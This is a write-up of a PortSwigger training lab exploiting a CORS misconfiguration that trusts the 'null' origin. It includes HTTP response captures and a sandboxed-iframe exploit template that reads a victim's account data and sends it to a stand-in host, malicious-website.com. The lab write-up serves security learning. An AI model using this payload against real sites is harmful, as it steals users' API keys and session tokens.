In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the "null" origin to obtain a user's private credentials.
Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to /accountDetails that fetches the user's API key:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
We can see that the Access-Control-Allow-Credentials: true is present, let's try to duplicate this request and change the Origin header to something like Origin: <https://example.com> and see if this value is reflected, the resulting response will be something like this:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
The Origin set in the request headers is not present in the Access-Control-Allow-Origin response headers, this could mean that the server does not have CORS vulnerabilities, let's try setting the Origin header to null :
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
The null Origin set in the request headers is present in the Access-Control-Allow-Origin response headers, this confirms us that this request has a CORS vulnerability via null origin, let's use the reading material's sandboxed iframe template to craft our exploit so that the request is sent with the Origin header set to null:
<html>
<iframe sandbox='allow-scripts allow-top-navigation allow-forms' src=\"data:text/html<script>,
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>\"></iframe>
</html>
Note: The finished exploit markdown template could not be published here because the editor did not accept it as valid, if you need to see the entire solution go to one of our other sources: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin/
Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin
Top comments (0)